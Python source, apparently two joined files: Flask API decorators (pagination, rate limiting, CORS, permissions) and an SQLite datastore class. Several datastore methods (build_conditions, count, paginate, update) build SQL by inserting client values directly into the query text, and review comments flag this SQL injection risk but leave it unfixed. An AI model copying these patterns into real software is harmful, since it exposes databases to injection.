        # Clients may request fewer items, never more than max_per_page.
        page = request.args.get('page', 1, type=int)
        per_page = min(request.args.get('per_page', max_per_page,
                                        type=int), max_per_page)
        # The view returns a SQLAlchemy query; evaluate it paginated.
        query = f(*args, **kwargs)
        p = query.paginate(page, per_page)
        rv = {'page': page, 'per_page': per_page, 'count': p.total}
        # Navigation links (None when there is no prev/next page).
        if p.has_prev:
            rv['prev'] = url_for(request.endpoint, page=p.prev_num,
                                 per_page=per_page,
                                 _external=True, **kwargs)
        else:
            rv['prev'] = None
        if p.has_next:
            rv['next'] = url_for(request.endpoint, page=p.next_num,
                                 per_page=per_page,
                                 _external=True, **kwargs)
        else:
            rv['next'] = None
        rv['first'] = url_for(request.endpoint, page=1,
                              per_page=per_page, _external=True,
                              **kwargs)
        rv['last'] = url_for(request.endpoint, page=p.pages,
                             per_page=per_page, _external=True,
                             **kwargs)
        rv['items'] = [item.serialize() for item in p.items]
        # Mirror the pagination info into custom response headers.
        headers = {
            headers_prefix + 'Page-Current': page,
            headers_prefix + 'Page-Prev': rv['prev'],
            headers_prefix + 'Page-Next': rv['next'],
            headers_prefix + 'Page-Item-Count': rv['count']
        }
        return rv, headers
    return wrapped
def async_task(f):
    """Run the decorated function in a background thread.

    NOTE(review): this decorator was originally named ``async``, which
    became a reserved keyword in Python 3.7 — ``def async(f):`` is now a
    SyntaxError — so it has been renamed. The wrapper also now returns
    the started ``Thread`` (previously ``None``) so callers can
    ``join()`` it; this is backward-compatible.

    :param func f: function to run asynchronously
    :return: wrapper that starts *f* in a new thread
    :rtype: func
    """
    @functools.wraps(f)
    def wrapper(*args, **kwargs):
        t = Thread(target=f, args=args, kwargs=kwargs)
        t.start()
        return t
    return wrapper
_limiter = None
class MemRateLimit(object):
    """In-memory rate limiter backed by a plain dictionary.

    One hit counter is kept per key; counters belong to a fixed time
    period and are purged lazily once that period has ended.
    """

    def __init__(self):
        self.counters = {}

    def is_allowed(self, key, limit, period):
        """Register a hit for *key* and decide whether it is allowed.

        Returns a 3-element tuple ``(allowed, remaining, reset)``:
        a True/False result, the number of remaining hits in the
        period, and the epoch second at which the counter resets.

        :param period: period length in seconds
        :param limit: maximum hits per period
        :param key: identity of the client/endpoint being throttled
        """
        now = int(time())
        period_start = now // period * period
        period_end = period_start + period
        # Drop counters from already-finished periods first.
        self.cleanup(now)
        counter = self.counters.setdefault(
            key, {'hits': 0, 'reset': period_end})
        counter['hits'] += 1
        remaining = max(limit - counter['hits'], 0)
        allowed = counter['hits'] <= limit
        return allowed, remaining, counter['reset']

    def cleanup(self, now):
        """Eliminate expired keys."""
        expired = [k for k, v in self.counters.items()
                   if v['reset'] < now]
        for k in expired:
            del self.counters[k]
def rate_limit(limit, period):
    """Limits the rate at which clients can send requests to 'limit' requests
    per 'period' seconds. Once a client goes over the limit all requests are
    answered with a status code 429 Too Many Requests for the remaining of
    that period.
    :param period:
    :param limit:
    """
    def decorator(f):
        @functools.wraps(f)
        def wrapped(*args, **kwargs):
            # initialize the rate limiter the first time here
            # (lazy module-level singleton shared by all decorated views)
            global _limiter
            if _limiter is None:
                _limiter = MemRateLimit()
            # generate a unique key to represent the decorated function and
            # the IP address of the client. Rate limiting counters are
            # maintained on each unique key.
            key = '{0}/{1}'.format(f.__name__, request.remote_addr)
            allowed, remaining, reset = _limiter.is_allowed(key, limit,
                                                            period)
            # set the rate limit headers in g, so that they are picked up
            # by the after_request handler and attached to the response
            g.headers = {
                'DO-RateLimit-Remaining': str(remaining),
                'DO-RateLimit-Limit': str(limit),
                'DO-RateLimit-Reset': str(reset)
            }
            # if the client went over the limit respond with a 429 status
            # code, else invoke the wrapped function
            if not allowed:
                response = jsonify(
                    {'status': 429, 'error': 'too many requests',
                     'message': 'You have exceeded your request rate'})
                response.status_code = 429
                return response
            # else we let the request through
            return f(*args, **kwargs)
        return wrapped
    return decorator
def api_deprecated(new_endpoint, message='This endpoint is deprecated.'):
    """Decorator that adds a deprecation message for an endpoint.

    The decorated function is never executed; the client receives a 301
    response whose JSON body and ``DO-New-Endpoint`` header point at the
    replacement endpoint.

    :param new_endpoint: New endpoint to use
    :param message: Warning message
    :return:
    :rtype: func
    """
    def decorator(f):
        @functools.wraps(f)
        def wrapped(*args, **kwargs):
            # Resolve the replacement URL once and reuse it for both the
            # body and the custom header (previously computed twice).
            new_url = url_for(new_endpoint, _external=True)
            response = jsonify({
                'message': message,
                'endpoint': new_url
            })
            response.status_code = 301
            response.headers['DO-New-Endpoint'] = new_url
            return response
        return wrapped
    return decorator
def permission_required(permission):
    """Build a decorator that aborts with 403 unless the current user
    holds *permission*."""
    def decorator(f):
        @functools.wraps(f)
        def wrapped(*args, **kwargs):
            if current_user.can(permission):
                return f(*args, **kwargs)
            abort(403)
        return wrapped
    return decorator
def admin_required(f):
    # Shortcut for permission_required(Permission.ADMINISTER).
    return permission_required(Permission.ADMINISTER)(f)
def needs_admin(f):
    """Allow the request only when ``g.user`` is an administrator;
    abort with 403 otherwise."""
    @functools.wraps(f)
    def wrapped(*args, **kwargs):
        if g.user.is_admin:
            return f(*args, **kwargs)
        abort(403)
    return wrapped
def crossdomain(origin=None, methods=None, headers=None,
                max_age=21600, attach_to_all=True,
                automatic_options=True):
    """Add CORS headers to response. Courtesy of Armin Ronacher.
    .. note::
        This is used only for localhost development. In production we use a
        reverse proxy.
    :param origin: allowed origin(s); a string or an iterable of strings
    :param methods: allowed methods; defaults to the OPTIONS response value
    :param headers: allowed/exposed headers; string or iterable of strings
    :param max_age: preflight cache lifetime in seconds (or a timedelta)
    :param attach_to_all: attach headers to every response, not only OPTIONS
    :param automatic_options: answer OPTIONS requests automatically
    :return:
    """
    if headers is None:
        headers = 'Content-Type, Accept, Authorization, Origin'
    if methods is not None:
        methods = ', '.join(sorted(x.upper() for x in methods))
    if headers is not None and not isinstance(headers, str):
        headers = ', '.join(x.upper() for x in headers)
    # Bugfix: ', '.join(None) raised TypeError when origin was left at its
    # default of None; only normalize non-string iterables.
    if origin is not None and not isinstance(origin, str):
        origin = ', '.join(origin)
    if isinstance(max_age, timedelta):
        max_age = max_age.total_seconds()

    def get_methods():
        # Prefer the explicit method list; otherwise mirror what Flask
        # advertises on a default OPTIONS response.
        if methods is not None:
            return methods
        options_resp = current_app.make_default_options_response()
        return options_resp.headers['allow']

    def decorator(f):
        def wrapped_function(*args, **kwargs):
            if automatic_options and request.method == 'OPTIONS':
                resp = current_app.make_default_options_response()
            else:
                resp = make_response(f(*args, **kwargs))
            if not attach_to_all and request.method != 'OPTIONS':
                return resp
            h = resp.headers
            h['Access-Control-Allow-Origin'] = origin
            h['Access-Control-Allow-Methods'] = get_methods()
            h['Access-Control-Max-Age'] = str(max_age)
            h['Access-Control-Allow-Credentials'] = 'true'
            if headers is not None:
                h['Access-Control-Allow-Headers'] = headers
                h['Access-Control-Expose-Headers'] = headers
            return resp

        # Flask must not auto-answer OPTIONS; this decorator handles it.
        f.provide_automatic_options = False
        return functools.update_wrapper(wrapped_function, f)
    return decorator
| |
"""
Implement some datastore based on SQL databases
"""
import sqlite3
from werkzeug.exceptions import NotFound, BadRequest
from .base import DataStore
from rest_api_framework.models import PkField
class SQLiteDataStore(DataStore):
    """
    Define a sqlite datastore for your ressource. You have to give
    __init__ a ressource_config parameter containing the information to
    connect to the database and to the table.

    example:

    .. code-block:: python

        data = {"table": "tweets",
                "name": "test.db"}
        model = ApiModel
        datastore = SQLiteDataStore(data, **options)

    SQLiteDataStore implements a naive wrapper to convert Field
    types into database types.

    * int will be saved in the database as INTEGER
    * float will be saved in the database as REAL
    * basestring will be saved in the database as TEXT
    * if the Field type is PkField, it will be saved as
      PRIMARY KEY AUTOINCREMENT

    As soon as the datastore is instantiated, the database is created
    if it does not exist, and the table is created too.

    .. note::

       - It is not possible to use :memory: databases either.
         The connection is closed after each operation.
    """

    # Field.base_type -> SQLite column type
    wrapper = {"integer": "integer",
               "float": "real",
               "string": "text"
               }

    def __init__(self, ressource_config, model, **options):
        # Keep a single shared connection; check_same_thread=False lets
        # the WSGI server reuse it across request threads.
        self.db = ressource_config["name"]
        self.conn = sqlite3.connect(ressource_config["name"],
                                    check_same_thread=False)
        cursor = self.conn.cursor()
        table = ressource_config["table"]
        super(SQLiteDataStore, self).__init__(
            {"conn": self.conn, "table": table},
            model,
            **options)
        self.create_database(cursor, table)
        self.conn.commit()
        # conn.close()
        self.fields = self.model.get_fields()

    def create_database(self, cursor, table):
        """Create *table* if needed from the model's field definitions."""
        statement = []
        for field in self.model.get_fields():
            query = "{0} {1}".format(field.name, self.wrapper[field.base_type])
            if isinstance(field, PkField):
                query += " primary key"
                if field.base_type == "integer":
                    query += " autoincrement"
            # Bugfix: NOT NULL used to be appended *after* the column
            # string was already added to the list, so required fields
            # silently lost their constraint.
            if "required" in field.options\
                    and field.options['required'] is True:
                query += " NOT NULL"
            statement.append(query)
        fields = ", ".join(statement)
        for field in self.model.get_fields():
            if "foreign" in field.options:
                fields += ",FOREIGN KEY ({0}) REFERENCES {1}({2})".format(
                    field.name, field.options["foreign"]["table"],
                    field.options["foreign"]["column"]
                )
        sql = 'create table if not exists {0} ({1})'.format(table, fields)
        cursor.execute(sql)

    def get_connector(self):
        """
        return a sqlite3 connection to communicate with the table
        define in self.db
        """
        # Enforce foreign key constraints on every use of the connection.
        self.conn.execute('pragma foreign_keys=on')
        return self.conn

    def filter(self, **kwargs):
        """
        Change kwargs["query"] with "WHERE X=Y statements". The
        filtering will be done with the actual evaluation of the query
        in :meth:`~.SQLiteDataStore.paginate` the sql can then be lazy
        """
        kwargs['query'] += ' FROM {0}'
        return kwargs

    def count(self, **data):
        """Return the number of rows matching the given filters."""
        # NOTE(review): build_conditions interpolates values into the SQL
        # text; see the warning on that method.
        cdt = self.build_conditions(data)
        if len(cdt) == 0:
            query = "SELECT COUNT (*) FROM {0}".format(
                self.ressource_config['table'])
        else:
            cdt = " AND ".join(cdt)
            query = "SELECT COUNT (*) FROM {0} WHERE {1}".format(
                self.ressource_config['table'],
                cdt
            )
        cursor = self.get_connector().cursor()
        cursor.execute(query)
        return cursor.fetchone()[0]

    def build_conditions(self, data):
        """Build "field='value'" SQL fragments from the filterable data.

        NOTE(review): values are interpolated directly into the SQL text,
        which is open to SQL injection; parameterizing would also require
        changing count() and paginate(), so it is only flagged here.
        """
        # Python 2/3 compatible (was dict.iteritems()); each condition is
        # a single-entry dict produced by get_conditions().
        return ["{0}='{1}'".format(k, v)
                for condition in self.get_conditions(data)
                for k, v in condition.items()]

    def get_conditions(self, data):
        """Return data as a list of single-entry {field: value} dicts,
        dropping keys that are neither model fields nor query internals."""
        rm = [elem for elem in data
              if elem not in ['query', 'fields']
              and elem not in self.model.get_fields_name()]
        for elem in rm:
            data.pop(elem)
        return [
            {k: v} for k, v in data.items() if k not in ["query", "fields"]
        ]

    def paginate(self, data, **kwargs):
        """
        paginate the result of filter using ids limits. Obviously, to
        work properly, you have to set the start to the last ids you
        receive from the last call on this method. The max number of
        row this method can give back depend on the paginate_by option.
        """
        where_query = self.build_conditions(data)
        args = []
        limit = kwargs.pop("end", None)
        if kwargs.get("start", None):
            # keyset pagination: resume after the last seen id
            where_query.append(" id >=?")
            args.append(kwargs.pop('start'))
        if len(where_query) > 0:
            data["query"] += " WHERE "
            data["query"] += " AND ".join(where_query)
        cursor = self.get_connector().cursor()
        # a hook for ordering
        data["query"] += " ORDER BY id ASC"
        if limit:
            data["query"] += " LIMIT {0}".format(limit)
        cursor.execute(data["query"].format(self.ressource_config['table']),
                       tuple(args)
                       )
        # zip each row with the selected field names into a dict
        objs = []
        for elem in cursor.fetchall():
            objs.append(dict(zip(self.fields, elem)))
        return objs

    def get_fields(self, **fields):
        """Resolve the list of field names to select, honoring partial
        responses and always including the primary key."""
        if self.partial:
            fields, kwargs = self.partial.get_partials(**fields)
            if not fields:
                fields = self.model.get_fields_name()
            for field in fields:
                if field not in self.model.get_fields_name():
                    raise BadRequest()
            if self.model.pk_field.name not in fields:
                fields.append(self.model.pk_field.name)
        else:
            fields = self.model.get_fields_name()
        return fields

    def get_list(self, **kwargs):
        """
        return all the objects, paginated if needed, fitered if
        filters have been set.
        """
        self.fields = self.get_fields(**kwargs)
        fields = ", ".join(self.fields)
        kwargs["query"] = 'SELECT {0}'.format(fields)
        start = kwargs.pop("offset", None)
        end = kwargs.pop("count", None)
        data = self.filter(**kwargs)
        return self.paginate(data, start=start, end=end)

    def get(self, identifier):
        """
        Return a single row or raise NotFound
        """
        fields = ",".join(self.model.get_fields_name())
        query = "select {0} from {1} where {2}=?".format(
            fields,
            self.ressource_config["table"],
            self.model.pk_field.name)
        cursor = self.get_connector().cursor()
        cursor.execute(query, (identifier,))
        obj = cursor.fetchone()
        if obj:
            fields = self.model.get_fields_name()
            return dict(zip(fields, obj))
        else:
            raise NotFound

    def create(self, data):
        """
        Validate the data with :meth:`.base.DataStore.validate`
        And, if data is valid, create the row in database and return it.
        """
        self.validate(data)
        # Python 2 stored values through unicode(); fall back to str on
        # Python 3 where unicode no longer exists.
        try:
            to_text = unicode  # noqa: F821 -- Python 2 only
        except NameError:
            to_text = str
        fields = []
        values = []
        for k, v in data.items():
            if k in self.model.get_fields_name():
                fields.append(str(k))
                values.append(to_text(v))
        conn = self.conn
        cursor = conn.cursor()
        # Bugfix: the column list used to be rendered via str(tuple(...)),
        # which quoted the names and produced invalid SQL ("('f',)") for a
        # single-column insert.
        query = "insert into {0} ({1}) values ({2})".format(
            self.ressource_config["table"],
            ", ".join(fields),
            ",".join(["?" for step in range(len(fields))])
        )
        cursor.execute(query, tuple(values))
        self.conn.commit()
        return cursor.lastrowid

    def update(self, obj, data):
        """
        Retreive the object to be updated
        (:meth:`~.SQLiteDataStore.get` will raise a NotFound error if the row
        does not exist)
        Validate the fields to be updated and return the updated row
        """
        self.get(obj[self.model.pk_field.name])
        self.validate_fields(data)
        fields = []
        values = []
        for k, v in data.items():
            if k in self.model.get_fields_name():
                fields.append(k)
                values.append(v)
        conn = self.conn
        cursor = conn.cursor()
        # NOTE(review): values are interpolated into the SQL text (SQL
        # injection risk); parameterizing would change how non-string
        # values are stored, so it is only flagged here.
        update = " ,".join(["{0}='{1}'".format(f, v) for f, v in zip(fields,
                                                                     values)])
        query = "update {0} set {1} WHERE {2}={3}".format(
            self.ressource_config["table"],
            update,
            self.model.pk_field.name,
            obj[self.model.pk_field.name]
        )
        cursor.execute(query)
        conn.commit()
        return self.get(obj[self.model.pk_field.name])

    def delete(self, identifier):
        """
        Retreive the object to be updated
        (:meth:`~.SQLiteDataStore.get` will raise a NotFound error if
        the row does not exist)
        Return None on success, Raise a 400 error if foreign key
        constrain prevent delete.
        """
        self.get(identifier)
        conn = self.conn
        cursor = conn.cursor()
        # Bugfix/security: the identifier is now bound as a parameter
        # instead of being formatted into the SQL text (injection-safe,
        # and works for string primary keys too).
        query = "delete from {0} where {1}=?".format(
            self.ressource_config["table"],
            self.model.pk_field.name)
        try:
            cursor.execute(query, (identifier,))
        except sqlite3.IntegrityError as e:
            # "except E, e" and e.message were Python-2-only; str(e)
            # carries the same text on both versions.
            message = ""
            if "foreign" in str(e):
                message = """another ressource depends on this
                object. Cloud not delete before all ressources
                depending on it are also deleted"""
            raise BadRequest(message)
        conn.commit()

    def __del__(self):
        # Close the shared connection when the datastore is collected.
        self.conn.close()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.